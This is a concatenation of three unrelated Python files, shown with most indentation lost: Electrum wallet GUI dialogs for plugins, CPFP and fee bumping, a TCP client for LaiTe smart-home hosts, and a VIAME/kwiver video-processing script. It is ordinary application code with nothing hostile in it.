self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: Transaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
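            # Child fee = desired total feerate x combined size - fee already paid
            # by the parent, clamped to the spendable output value and to at least
            # ~1 sat/byte for the combined size.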
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
            self.show_error(f'''{_("Can't CPFP")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
YouJiaClient.py
|
"""
Copyright 2019 Vincent Qiu
Email: nov30th@gmail.com
Description:
莱特 LaiTe Devices (laitecn) Host Connection Manager
Notice:
"""
import logging
import queue
import socket
import threading
import time
from typing import List, Dict
_LOGGER = logging.getLogger(__name__)
RETRY_SECS = 3
YOUJIA_HOSTS = {} # type: Dict[str,YouJiaClient]
DEFAULT_SOCKET_OPTION = [(socket.SOL_TCP, socket.TCP_NODELAY, 1), ]
if hasattr(socket, "SO_KEEPALIVE"):
DEFAULT_SOCKET_OPTION.append((socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1))
if hasattr(socket, "TCP_KEEPIDLE"):
DEFAULT_SOCKET_OPTION.append((socket.SOL_TCP, socket.TCP_KEEPIDLE, 1))
if hasattr(socket, "TCP_KEEPINTVL"):
DEFAULT_SOCKET_OPTION.append((socket.SOL_TCP, socket.TCP_KEEPINTVL, 1))
if hasattr(socket, "TCP_KEEPCNT"):
DEFAULT_SOCKET_OPTION.append((socket.SOL_TCP, socket.TCP_KEEPCNT, 5))
class YouJiaClient:
def __init__(self,
host_name: str,
host: str,
port: int,
device_id: str,
username: str,
password: str,
control_delay: float
) -> None:
self._sock = None # type: socket.socket
self._host_name = host_name # type: str
self._host = host # type: str
self._port = port # type: int
self._device_id = device_id.lower() # type: str
self._username = username # type: str
self._password = password # type: str
self._message_hex_receiver = [] # type: List
self._message_str_receiver = [] # type: List
self._is_connected = False
self._control_delay = control_delay # type: float
self.sending_queue = queue.Queue() # type: queue.Queue
self._connection_thread = threading.Thread(target=self.connect_loop)
self._connection_thread.daemon = True
self._sending_str_thread = threading.Thread(target=self.sending_loop)
self._sending_str_thread.daemon = True
# self._keep_alive_thread = threading.Thread(target=self.keep_alive_and_error_detect)
self._connection_thread.start()
self._sending_str_thread.start()
# self._keep_alive_thread.start()
def is_connected(self):
return self._is_connected
# def keep_alive_and_error_detect(self):
# while True:
# time.sleep(5)
# if self._is_connected:
# try:
# _LOGGER.warn("KEEP ALIVE.......SENDING")
# self._sock.sendall(bytes([0x00, 0x01, 0x02, 0xFF]))
# except Exception as e:
# _LOGGER.error(e)
# _LOGGER.error("Keep alive error...")
def sending_loop(self):
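        # Consume queued commands and write them to the socket, pausing
        # self._control_delay seconds between sends so the host is not flooded.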
while True:
time.sleep(self._control_delay)
item = self.sending_queue.get()
            if not self._is_connected:
                # Queue.empty() only reports state; drain commands queued while disconnected
                while not self.sending_queue.empty():
                    self.sending_queue.get_nowait()
                time.sleep(3)
                continue
_LOGGER.debug("Sending command %s", ''.join('{:02x}'.format(x) for x in item))
self._sock.sendall(item)
def connect_loop(self):
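        # Maintain the TCP connection: (re)connect with retries, send an initial
        # 4-byte message, then dispatch everything received to the registered
        # receivers until the connection drops and we reconnect.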
server_address = (self._host, self._port)
_LOGGER.debug('connecting to {} port {}'.format(*server_address))
while True:
while True:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
for name, value, value2 in DEFAULT_SOCKET_OPTION:
sock.setsockopt(name, value, value2)
self._sock = sock
sock.connect(server_address)
self._is_connected = True
_LOGGER.info('connected to {} port {}'.format(*server_address))
break
except Exception as e:
self._is_connected = False
_LOGGER.error(e)
_LOGGER.error("You Jia host %s failed!", self._host_name)
_LOGGER.error("Can not connect to YouJia host, %s%s", self._host, self._port)
_LOGGER.error("Retry after %s secs...", RETRY_SECS)
time.sleep(RETRY_SECS)
try:
# Send data
sock.sendall(bytes([0xFF, 0xFF, 0xFF, 0xFF]))
while True:
data = sock.recv(512)
_LOGGER.debug('received {!r}'.format(data))
self.handle_receivers(data)
except Exception as e:
self._is_connected = False
_LOGGER.error(e)
_LOGGER.error("Host %s Connection has been closed, reconnecting...", self._host_name)
sock.close()
time.sleep(RETRY_SECS)
def handle_receivers(self, data):
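        # Fan received data out to all registered receivers: string receivers get
        # a lowercase hex dump of the bytes, hex receivers get the raw bytes.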
if len(self._message_str_receiver) > 0:
str_message = ''.join('{:02x}'.format(x) for x in data) # str(binascii.hexlify(bytearray(data)))
            _LOGGER.warning("Handling string message %s", str_message)
for receiver in self._message_str_receiver:
try:
receiver(str_message)
except Exception as e:
_LOGGER.fatal(e)
for receiver in self._message_hex_receiver:
receiver(data)
def add_hex_receiver(self, client_hex_receiver):
self._message_hex_receiver.append(client_hex_receiver)
def add_str_receiver(self, client_str_receiver):
self._message_str_receiver.append(client_str_receiver)
def send_str_command(self, message: str) -> None:
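        # Commands are hex strings; the device id and the fixed 'CDB8B4AB' token
        # are prepended before the payload is queued as raw bytes.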
if self._sock is not None and self._is_connected:
message = self._device_id + 'CDB8B4AB' + message
            _LOGGER.warning("Sending bytes to host %s", message)
self.sending_queue.put(bytes.fromhex(message))
else:
_LOGGER.error("Can not send commands as host %s is not connected", self._host_name)
# def send_hex_command(self, message: bytes) -> None:
# if self._sock is not None and self._is_connected:
# self._sock.sendall(message)
# else:
# _LOGGER.error("Can not send commands as host %s is not connected", self._host_name)
def get_host(host_name: str) -> YouJiaClient:
return YOUJIA_HOSTS[host_name]
|
process_video.py
|
#!/usr/bin/env python
import sys
import os
import shutil
import math
import numpy as np
import argparse
import contextlib
import itertools
import signal
import subprocess
import tempfile
import threading
try:
import queue # Python 3
except ImportError:
import Queue as queue # Python 2
sys.dont_write_bytecode = True
import database_tool
# Character short-cuts and global constants
if os.name == 'nt':
div = '\\'
else:
div = '/'
lb = '\n'
lb1 = lb
lb2 = lb * 2
lb3 = lb * 3
detection_ext = "_detections.csv"
track_ext = "_tracks.csv"
default_pipeline = "pipelines" + div + "index_default.pipe"
no_pipeline = "none"
# Global flag to see if any video has successfully completed processing
any_video_complete = False
# Helper functions to list files with a given extension in a directory
def list_files_in_dir( folder ):
if not os.path.exists( folder ) and os.path.exists( folder + ".lnk" ):
folder = folder + ".lnk"
folder = folder if not os.path.islink( folder ) else os.readlink( folder )
if not os.path.isdir( folder ):
exit_with_error( "Input folder \"" + folder + "\" does not exist" )
return [
os.path.join( folder, f ) for f in sorted( os.listdir( folder ) )
if not f.startswith('.')
]
def list_files_in_dir_w_ext( folder, extension ):
return [ f for f in list_files_in_dir( folder ) if f.endswith( extension ) ]
def has_valid_ext( f, ext_list ):
for ext in ext_list:
if f.lower().endswith( ext ):
return True
return False
def has_file_with_extension( folder, extension ):
  # list_files_in_dir_w_ext already filters by extension, so any result is a match
  return len( list_files_in_dir_w_ext( folder, extension ) ) > 0
def list_files_in_dir_w_exts( folder, extensions ):
ext_list = extensions.split(";")
return [ f for f in list_files_in_dir( folder ) if has_valid_ext( f, ext_list ) ]
def list_videos_in_dir( folder, extensions ):
files = list_files_in_dir_w_exts( folder, extensions )
if len( files ) == 0:
files = [ f for f in list_files_in_dir( folder ) if os.path.isdir( f ) ]
if len( files ) == 0:
files = list_files_in_dir( folder )
return files
# Default message logging
def log_info( msg ):
sys.stdout.write( msg )
sys.stdout.flush()
# Create a directory if it doesn't exist
def create_dir( dirname, logging=True, recreate=False, prompt=True ):
if dirname == '.' or dirname == "":
return
if recreate:
if os.path.exists( dirname ):
if not prompt or database_tool.query_yes_no( lb1 + "Reset folder: " + dirname + "?" ):
if logging:
log_info( "Removing " + dirname + lb )
shutil.rmtree( dirname )
elif prompt:
sys.exit(0)
else:
log_info( lb )
if not os.path.exists( dirname ):
if logging:
log_info( "Creating " + dirname + lb )
os.makedirs( dirname )
CUDA_VISIBLE_DEVICES = "CUDA_VISIBLE_DEVICES"
def get_real_gpu_index(n):
"""Return the real index for the nth GPU as a string. This respects
CUDA_VISIBLE_DEVICES
"""
cvd = os.environ.get( CUDA_VISIBLE_DEVICES )
if not cvd: # Treat empty string and None the same
return str(n)
# This is an attempt to respect the fact that an invalid index hides
# the GPUs listed after it
cvd_parsed = list( itertools.takewhile( lambda i: not i.startswith('-'),
cvd.split(',') ) )
if 0 <= n < len( cvd_parsed ):
return cvd_parsed[n]
else:
raise IndexError('Only {} visible GPUs; you asked for number {}!'
.format( len( cvd_parsed ), n) )
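# Illustrative examples (environment values assumed): with CUDA_VISIBLE_DEVICES="2,3",
# get_real_gpu_index(0) returns "2" and get_real_gpu_index(1) returns "3"; with the
# variable unset or empty, get_real_gpu_index(1) simply returns "1".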
def execute_command( cmd, stdout=None, stderr=None, gpu=None ):
if gpu is None:
env = None
else:
env = dict(os.environ)
env[ CUDA_VISIBLE_DEVICES ] = get_real_gpu_index( gpu )
return subprocess.call( cmd, stdout=stdout, stderr=stderr, env=env )
def get_script_path():
return os.path.dirname( os.path.realpath( sys.argv[0] ) )
def get_pipeline_cmd( debug=False ):
if os.name == 'nt':
if debug:
return [ 'kwiver.exe', 'runner' ]
else:
return [ 'kwiver.exe', 'runner' ]
else:
if debug:
return [ 'gdb', '--args', 'kwiver', 'runner' ]
else:
return [ 'kwiver', 'runner' ]
def exit_with_error( error_str, force=False ):
log_info( lb1 + 'ERROR: ' + error_str + lb2 )
# Kill this process to end all threads
if not isinstance( threading.current_thread(), threading._MainThread ):
if os.name == 'nt':
os.kill( os.getpid(), signal.SIGTERM )
else:
os.kill( os.getpid(), signal.SIGKILL )
# Default exit case, if main thread
sys.exit(0)
def check_file( filename ):
if not os.path.exists( filename ):
exit_with_error( "Unable to find: " + filename )
return filename
@contextlib.contextmanager
def get_log_output_files( output_prefix ):
if os.name == 'nt':
with open( output_prefix + '.out.txt', 'w' ) as fo, \
open( output_prefix + '.err.txt', 'w' ) as fe:
yield dict( stdout=fo, stderr=fe)
else:
with open( output_prefix + '.txt', 'w' ) as fo:
yield dict( stdout=fo, stderr=fo )
def find_file( filename ):
if( os.path.exists( filename ) ):
return filename
elif os.path.exists( get_script_path() + div + filename ):
return get_script_path() + div + filename
else:
exit_with_error( "Unable to find " + filename )
def make_filelist_for_dir( input_dir, output_dir, output_name ):
  # The most common extension in the folder most likely belongs to the images.
  # People sometimes keep small text files alongside the images, so just pick
  # the most frequent filetype.
exts = dict()
files = dict()
for f in sorted( os.listdir( input_dir ) ):
f_fp = os.path.join( input_dir, f )
if os.path.isfile( f_fp ):
_, ext = os.path.splitext( f )
if ext in exts:
exts[ext] += 1
files[ext].append( f_fp )
else:
exts[ext] = 1
files[ext] = [ f_fp ]
if len(exts) == 0:
return ""
top_ext = sorted( exts, key=exts.get, reverse=True )[0]
# Write out list to file
output_file = os.path.join( output_dir, output_name + ".txt" )
fout = open( output_file, "w" )
for f in files[top_ext]:
    fout.write( os.path.abspath( f ) + lb1 )
fout.close()
return output_file
# Other helpers
def signal_handler( signal, frame ):
log_info( lb1 )
exit_with_error( 'Processing aborted, see you next time' )
def file_length( filename ):
if not os.path.exists( filename ):
exit_with_error( filename + " does not exist" )
  count = 0
  with open( filename, 'r' ) as f:
    for count, _line in enumerate( f, 1 ):
      pass
  return count
def split_image_list( image_list_file, n, dir ):
"""Create and return the paths to n temp files that when appended
reproduce the original file. The names are created
deterministically like "orig_name_part0.ext", "orig_name_part1.ext",
etc., but with the original name used as is when n == 1.
Existing files with the same names are overwritten without question.
Deleting the files is the responsibility of the caller.
"""
input_basename = os.path.basename( image_list_file )
if n == 1:
new_file_names = [ input_basename ]
else:
prefix, suffix = os.path.splitext( input_basename )
num_width = len( str( n - 1 ) )
new_file_names = [
prefix + '_part{:0{}}'.format( i, num_width ) + suffix
for i in range( n )
]
new_file_names = [ os.path.join( dir, fn ) for fn in new_file_names ]
try:
# Build manually to have the intermediate state in case of error
temp_files = []
divisor = math.floor( file_length( image_list_file ) / n ) + 1
for fn in new_file_names:
temp_files.append( open( fn, 'w' ) )
with open( image_list_file ) as f:
for i, line in enumerate( f ):
temp_index = int( math.floor( i / divisor ) )
temp_files[ temp_index ].write( line )
finally:
for f in temp_files:
f.close()
return new_file_names
def fset( setting_str ):
return ['-s', setting_str]
def video_output_settings_list( options, basename ):
output_dir = options.output_directory
return list(itertools.chain(
fset( 'detector_writer:file_name=' + output_dir + div + basename + detection_ext ),
fset( 'detector_writer:stream_identifier=' + basename ),
fset( 'track_writer:file_name=' + output_dir + div + basename + track_ext ),
fset( 'track_writer:stream_identifier=' + basename ),
fset( 'track_writer_db:writer:db:video_name=' + basename ),
fset( 'track_writer_kw18:file_name=' + output_dir + div + basename + '.kw18' ),
fset( 'descriptor_writer_db:writer:db:video_name=' + basename ),
fset( 'track_descriptor:uid_basename=' + basename ),
fset( 'kwa_writer:output_directory=' + output_dir ),
fset( 'kwa_writer:base_filename=' + basename ),
fset( 'kwa_writer:stream_id=' + basename ),
))
def plot_settings_list( options, basename ):
output_dir = options.output_directory
return list(itertools.chain(
fset( 'detector_writer:file_name=' + output_dir + div + basename + detection_ext ),
fset( 'kwa_writer:output_directory=' + output_dir ),
fset( 'kwa_writer:base_filename=' + basename ),
fset( 'kwa_writer:stream_id=' + basename ),
))
def archive_dimension_settings_list( options ):
if len( options.archive_width ) > 0:
return list(itertools.chain(
fset( 'kwa_writer:fixed_col_count=' + options.archive_width ),
fset( 'kwa_writer:fixed_row_count=' + options.archive_height ),
))
return []
def object_detector_settings_list( options ):
if len( options.detection_threshold ) > 0:
return list( itertools.chain(
fset( 'detector:detector:darknet:thresh=' + options.detection_threshold ),
fset( 'detector1:detector:darknet:thresh=' + options.detection_threshold ),
fset( 'detector2:detector:darknet:thresh=' + options.detection_threshold ),
fset( 'detector_filter:filter:class_probablity_filter:threshold=' + options.detection_threshold ),
))
return []
def object_tracker_settings_list( options ):
if len( options.tracker_threshold ) > 0:
return list( itertools.chain(
fset( 'track_initializer:track_initializer:threshold:'
'filter:class_probablity_filter:threshold=' + options.tracker_threshold ),
fset( 'tracker:detection_select_threshold=' + options.tracker_threshold ),
))
return []
def video_frame_rate_settings_list( options ):
output = []
if len( options.input_frame_rate ) > 0:
output += fset( 'input:frame_time=' + str( 1.0 / float( options.input_frame_rate ) ) )
if len( options.frame_rate ) > 0:
output += fset( 'downsampler:target_frame_rate=' + options.frame_rate )
if len( options.batch_size ) > 0:
output += fset( 'downsampler:burst_frame_count=' + options.batch_size )
if len( options.batch_skip ) > 0:
output += fset( 'downsampler:burst_frame_break=' + options.batch_skip )
return output
def groundtruth_reader_settings_list( options, gt_files, basename, gpu_id, gt_type ):
output = []
if len( gt_files ) == 0:
exit_with_error( "Directory " + basename + " contains no GT files" )
elif len( gt_files ) > 1:
exit_with_error( "Directory " + basename + " contains multiple GT files" )
else:
if gpu_id > 0:
output_extension = str( gpu_id ) + '.lbl'
else:
output_extension = 'lbl'
lbl_file = options.input_dir + "/labels.txt"
if not os.path.exists( lbl_file ):
lbl_file = "labels.txt"
output += fset( 'detection_reader:file_name=' + gt_files[0] )
output += fset( 'detection_reader:reader:type=' + gt_type )
output += fset( 'write_descriptor_ids:category_file=' + lbl_file )
output += fset( 'write_descriptor_ids:output_directory=' + options.output_directory )
output += fset( 'write_descriptor_ids:output_extension=' + output_extension )
return output
def remove_quotes( input_str ):
return input_str.replace( "\"", "" )
def add_final_list_csv( args, video_list ):
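  # Merge the per-part detection CSVs produced for a split image list back into a
  # single CSV, remapping duplicated track ids and offsetting frame numbers by the
  # length of the preceding parts.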
if len( video_list ) == 0:
return
for video in video_list:
if video.endswith( "_part0.txt" ):
output_file = video_list[0].replace( "_part0.txt", detection_ext )
output_stream = open( output_file, "w" )
id_adjustment = 0
is_first = True
used_ids = set()
last_id = 0
input_stream = open( video.replace( ".txt", detection_ext ), "r" )
id_mappings = dict()
for line in input_stream:
if len( line ) > 0 and ( line[0] == '#' or line[0:9] == 'target_id' ):
if is_first:
output_stream.write( line )
continue
parsed_line = line.rstrip().split(',')
if len( parsed_line ) < 2:
continue
orig_id = int( parsed_line[0] )
if orig_id in id_mappings:
final_id = id_mappings[ orig_id ]
elif orig_id in used_ids:
last_id = last_id + 1
final_id = last_id
id_mappings[ orig_id ] = final_id
used_ids.add( final_id )
else:
final_id = orig_id
id_mappings[ orig_id ] = orig_id
used_ids.add( orig_id )
last_id = max( last_id, final_id )
parsed_line[0] = str( final_id )
parsed_line[2] = str( int( parsed_line[2] ) + id_adjustment )
output_stream.write( ','.join( parsed_line ) + '\n' )
id_adjustment = id_adjustment + file_length( video )
input_stream.close()
is_first = False
# Process a single video
def process_video_kwiver( input_name, options, is_image_list=False, base_ovrd='',
cpu=0, gpu=None, write_track_time=True ):
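  # Run the configured kwiver pipeline on a single video, image folder or image
  # list: build the '-s key=value' setting overrides, optionally wire in ground
  # truth readers, then execute the runner, logging to per-video files if enabled.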
if gpu is None:
gpu = 0
multi_threaded = ( options.gpu_count * options.pipes > 1 )
auto_detect_gt = ( len( options.auto_detect_gt ) > 0 )
input_basename = os.path.basename( input_name )
input_ext = os.path.splitext( input_name )[1]
if multi_threaded:
log_info( 'Processing: {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Processing: {} on GPU... '.format( input_basename ) )
# Get video name without extension and full path
if len( base_ovrd ) > 0:
basename_no_ext = base_ovrd
else:
basename_no_ext = os.path.splitext( input_basename )[0]
# Formulate input setting string
if auto_detect_gt:
if options.auto_detect_gt == 'habcam' or 'csv' in options.auto_detect_gt:
gt_ext = '.csv'
elif options.auto_detect_gt[0] != '.':
gt_ext = '.' + options.auto_detect_gt
else:
gt_ext = options.auto_detect_gt
if not is_image_list and \
( input_ext == '.csv' or input_ext == '.txt' or input_name == "__pycache__" ):
if multi_threaded:
log_info( 'Skipped {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Skipped' + lb1 )
return
elif not os.path.exists( input_name ):
if multi_threaded:
log_info( 'Skipped {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Skipped' + lb1 )
return
elif os.path.isdir( input_name ):
if auto_detect_gt:
gt_files = list_files_in_dir_w_ext( input_name, gt_ext )
input_name = make_filelist_for_dir( input_name, options.output_directory, basename_no_ext )
if len( input_name ) == 0:
if multi_threaded:
log_info( 'Skipped {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Skipped' + lb1 )
return
is_image_list = True
elif auto_detect_gt:
input_path = os.path.dirname( os.path.abspath( input_name ) )
gt_files = list_files_in_dir_w_ext( input_path, gt_ext )
# Formulate command
input_settings = fset( 'input:video_filename=' + input_name )
if not is_image_list:
input_settings += fset( 'input:video_reader:type=vidl_ffmpeg' )
elif options.ts_from_file:
input_settings += fset( 'input:video_reader:type=add_timestamp_from_filename' )
command = ( get_pipeline_cmd( options.debug ) +
[ find_file( options.pipeline ) ] +
input_settings )
command += video_frame_rate_settings_list( options )
command += video_output_settings_list( options, basename_no_ext )
command += archive_dimension_settings_list( options )
command += object_detector_settings_list( options )
command += object_tracker_settings_list( options )
if options.write_svm_info and not auto_detect_gt:
if len( options.input_detections ) == 0:
exit_with_error( "Input detections must be specified to write out svm header info" )
if not os.path.exists( options.input_detections ):
exit_with_error( "Unable to find input detections" )
gt_files = [ options.input_detections ]
if auto_detect_gt or options.write_svm_info:
gt_type = options.auto_detect_gt if auto_detect_gt else "viame_csv"
command += groundtruth_reader_settings_list( options, gt_files, basename_no_ext, gpu, gt_type )
if write_track_time:
command += fset( 'track_writer:writer:viame_csv:write_time_as_uid=true' )
command += fset( 'detector_writer:writer:viame_csv:write_time_as_uid=true' )
else:
command += fset( 'track_writer:writer:viame_csv:stream_identifier=' + input_basename )
command += fset( 'detector_writer:writer:viame_csv:stream_identifier=' + input_basename )
if len( options.input_detections ) > 0:
command += fset( "detection_reader:file_name=" + options.input_detections )
try:
if len( options.extra_settings ) > 0:
for extra_option in options.extra_settings:
command += fset( " ".join( extra_option ) )
except:
pass
# Process command, possibly with logging
log_base = ""
if len( options.log_directory ) > 0 and not options.debug and options.log_directory != "PIPE":
log_base = options.output_directory + div + options.log_directory + div + basename_no_ext
with get_log_output_files( log_base ) as kwargs:
res = execute_command( command, gpu=gpu, **kwargs )
else:
res = execute_command( command, gpu=gpu )
global any_video_complete
if res == 0:
if multi_threaded:
log_info( 'Completed: {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Success' + lb1 )
any_video_complete = True
else:
if multi_threaded:
      log_info( 'Failure: {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Failure' + lb1 )
if res == -11:
s = os.statvfs( options.output_directory )
if s.f_bavail * s.f_frsize < 100000000:
exit_with_error( lb1 + 'Out of disk space. Clean up space and then re-run.' )
log_info( lb1 + 'Pipeline failed with code 11. This is typically indicative of an '
'issue with system resources, e.g. low disk space or running out of '
'memory, but could be indicative of a pipeline issue. It\'s also possible '
'the pipeline you are running just had a shutdown issue. Attempting to '
'continue processing.' + lb1 )
any_video_complete = True
if not any_video_complete:
if len( log_base ) > 0:
exit_with_error( 'Processing failed, check ' + log_base + '.txt, terminating.' )
else:
exit_with_error( 'Processing failed, terminating.' )
elif len( log_base ) > 0:
log_info( lb1 + 'Check ' + log_base + '.txt for error messages' + lb2 )
# Main Function
if __name__ == "__main__" :
parser = argparse.ArgumentParser(description="Process new videos",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-v", dest="input_video", default="",
help="Input single video to process")
parser.add_argument("-d", dest="input_dir", default="",
help="Input directory of videos or image folders to process")
parser.add_argument("-l", dest="input_list", default="",
help="Input list of image files to process")
parser.add_argument("-p", dest="pipeline", default=default_pipeline,
help="Input pipeline for processing video or image data")
parser.add_argument("-s", dest="extra_settings", action='append', nargs='*',
help="Extra command line arguments for the pipeline runner")
parser.add_argument("-id", dest="input_detections", default="",
help="Input detections around which to create descriptors")
parser.add_argument("-o", dest="output_directory", default=".",
help="Output directory to store files in")
parser.add_argument("-logs", dest="log_directory", default="logs",
help="Output sub-directory for log files, if empty will not use files")
parser.add_argument("-video-exts", dest="video_exts", default="3qp;3g2;amv;asf;avi;drc;gif;gifv;"
"f4v;f4p;f4a;f4bflv;m4v;mkv;mp4;m4p;m4v;mpg;mpg2;mp2;mpeg;mpe;mpv;mng;mts;"
"m2ts;mov;mxf;nsv;ogg;ogv;qt;roq;rm;rmvb;svi;webm;wmv;vob;yuv",
help="Allowable video extensions")
parser.add_argument("-image-exts", dest="image_exts", default="bmp;dds;gif;heic;jpg;jpeg;png;psd;"
"psp;pspimage;tga;thm;tif;tiff;yuv",
help="Allowable image extensions")
parser.add_argument("-frate", dest="frame_rate", default="",
help="Processing frame rate over-ride to process videos at, specified "
"in hertz (frames per second)" )
